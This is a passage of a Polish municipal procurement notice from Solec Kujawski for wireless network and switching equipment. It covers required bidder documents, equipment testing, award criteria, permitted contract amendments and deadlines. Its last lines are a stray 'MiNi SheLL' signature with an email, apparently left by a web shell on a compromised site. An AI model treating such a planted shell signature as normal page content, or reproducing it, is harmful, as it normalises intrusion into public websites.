z oryginałem przez Wykonawcę w zakresie wydajności oferowanych komputerów stacjonarnych, pamięci operacyjnej RAM, pamięci masowej i kart graficznych,-dokument potwierdzający poprawną współpracę oferowanych komputerów z oferowanym systemem operacyjnym  np.  w formie wydruku  ze strony www producenta oprogramowania, dostarczenia do siedziby Zamawiającego, na własny koszt, następującego sprzętu do przeprowadzenia testów w celu sprawdzenia zgodności parametrów oferowanego sprzętu z wymogami opisanymi w STWiOR:
Kontroler WLAN (zgodnie z pkt. 2.5.1 ST_04) - 1 szt.Kontroler Dostępu Użytkowników (zgodnie z pkt. 2.5.4 ST_04) - 1 szt.Punkt Dostępowy Zewnętrzny (zgodnie z pkt. 2.5.3 ST_04) - 1 szt.Punkt Dostępowy Wewnętrzny (zgodnie z pkt. 2.5.2 ST_04)-1 szt.Przełącznik dystrybucyjny (zgodnie z pkt. 2.4.3 ST_04) - 1 szt.Przełącznik dostępowy (zgodnie z pkt. 2.4.4 ST_04) - 1 szt. Testy przeprowadzone zostaną w siedzibie Zamawiającego, w sposób opisany w załączniku nr 9a (Program testów) 
Sprzęt dostarczony przez Wykonawców do przeprowadzenia testów pozostanie w siedzibie Zamawiającego do upływu terminu przewidzianego do  wniesienia środka ochrony prawnej, a następnie zwrócony Wykonawcom, na ich koszt.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy niezbędnych zasobów do korzystania z nich przy wykonywaniu zamówienia (zgodnie z art. 26 ust. 2b ustawy Pzp) - w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów. Pisemne zobowiązanie innych podmiotów należy złożyć w oryginale.10.1	Oświadczenie o części zamówienia przewidzianej do wykonania przez podwykonawców   (zał. nr 7 do SIWZ);Wypełnione Zbiorcze Zestawienie Kosztów (ZZK), stanowiące zał. nr 10 SIWZ. Gdy ofertę podpisuje osoba, która nie jest wymieniona w dokumencie stwierdzającym uprawnienia do występowania w obrocie prawnym, do oferty musi być dołączone na piśmie stosowne pełnomocnictwo w tej sprawie podpisane przez osoby upoważnione do reprezentowania Wykonawcy, o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania zmian umowy w stosunku do treści oferty, w zakresie przedmiotu zamówienia, terminu realizacji, wynagrodzenia, w szczególności, gdy: 3.1.konieczne będzie wprowadzenie zmian będących następstwem zawieszenia realizacji usług przez Zamawiającego lub w następstwie działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji, a w szczególności zarządców lub właścicieli gruntów, nieruchomości,
3.2.konieczne będą zmiany umowy, wynikające z dodatkowych wymagań instytucji współfinansującej realizację przedmiotu umowy,
3.3.z przyczyn niezależnych od Wykonawcy nastąpi wydłużenie czasu wydania ewentualnych decyzji administracyjnych przez właściwe organy, jeżeli okres ten będzie dłuższy w stosunku do terminów wynikających z obowiązujących prawem terminów; 
3.4.z przyczyn niezależnych od Wykonawcy nie można wykonać zamówienia w terminie pierwotnym wykonania usługi z uwagi na wystąpienie zdarzeń losowych lub nieprzewidzianych warunków i zjawisk atmosferycznych lub działania siły wyższej (np. klęski żywiołowe, zdarzenia losowe, katastrofy, strajki itp.)  mających  wpływ na terminowość wykonania usługi; 
3.5.z powodu wprowadzenia zmian w dokumentacji lub sposobie realizacji usługi, gdy zaistnieje potrzeba wykonania robót, usług lub dostaw dodatkowych, nieobjętych przedmiotem niniejszego zamówienia, a koniecznych do jego prawidłowego wykonania lub ulepszenia, bez których mogą nie zostać osiągnięte zakładane parametry;
3.6.wystąpią kolizje z planowanymi lub równolegle prowadzonymi przez inne podmioty robotami (w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji); 
3.7.pojawią się na rynku urządzenia nowszej generacji lub rozwiązania innowacyjne pozwalające na zmniejszenie kosztów realizacji przedmiotu umowy, przyszłe koszty eksploatacji wykonanego przedmiotu umowy a także w przypadku rozwiązań umożliwiających uzyskanie lepszej jakości usługi; 
3.8.wystąpią zmiany spowodowane nieprzewidzianymi w SIWZ warunkami archeologicznymi lub terenowymi, w szczególności: niewypały i niewybuchy lub ujawnione stanowiska archeologiczne; 
3.9.możliwa będzie zmiana zakresu przedmiotu umowy korzystna dla Zamawiającego, spowodowana obniżeniem kosztu wykonania zamówienia i tym samym wynagrodzenia Wykonawcy;3.10.	nastąpi zmiana przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT - możliwa  zmiana wynagrodzenia Wykonawcy; 
3.11.	wejdą w życie regulacje prawne wprowadzone po dacie wejścia w życie umowy, wywołujące potrzebę jej zmiany (np. przepisy p-poż., przepisy dotyczące obiektów zabytkowych itp.); 
3.12.nastąpi zmiana Personelu Wykonawcy lub oferowanych rozwiązań niepowodująca po stronie Wykonawcy zmiany warunków udziału; 
3.13.nastąpi ewentualna zmiana terminu rozpoczęcia realizacji zamówienia, mając na względzie np. możliwość przedłużenia się procedury wyboru wykonawcy.
4.Dopuszcza się możliwość zmiany na etapie realizacji zamówienia podmiotów trzecich, o których mowa w art. 26 ust. 2b ustawy Pzp, za pomocą których Wykonawca wykazał spełnianie warunków udziału w postępowaniu. W takim przypadku zaproponowany nowy Podwykonawca, zobowiązany jest wykazać Zamawiającemu spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy Podwykonawca.
5.Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności zmiany i jej uzasadnienie.
6.Warunkiem wprowadzenia w/w zmian będzie ich pisemne uzasadnienie. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron w formie pisemnej zastrzeżonej pod rygorem nieważności, z zastrzeżeniem pkt. 7.
7.Zmiana terminu zakończenia realizacji przedmiotu zamówienia możliwa będzie jedynie po uzyskaniu zgody Instytucji Zarządzającej EFRR na zmianę terminu zakończenia realizacji zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.soleckujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. 23 Stycznia 7
86-050 Solec Kujawski
pokój nr 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 12:00, miejsce: Urząd Miasta i Gminy
ul. 23 Stycznia 7
86-050 Solec Kujawski
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest dofinansowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach  Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013 Oś priorytetowa 4. Rozwój infrastruktury społeczeństwa informacyjnego. Działanie 4.1 Rozwój infrastruktury ICT..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com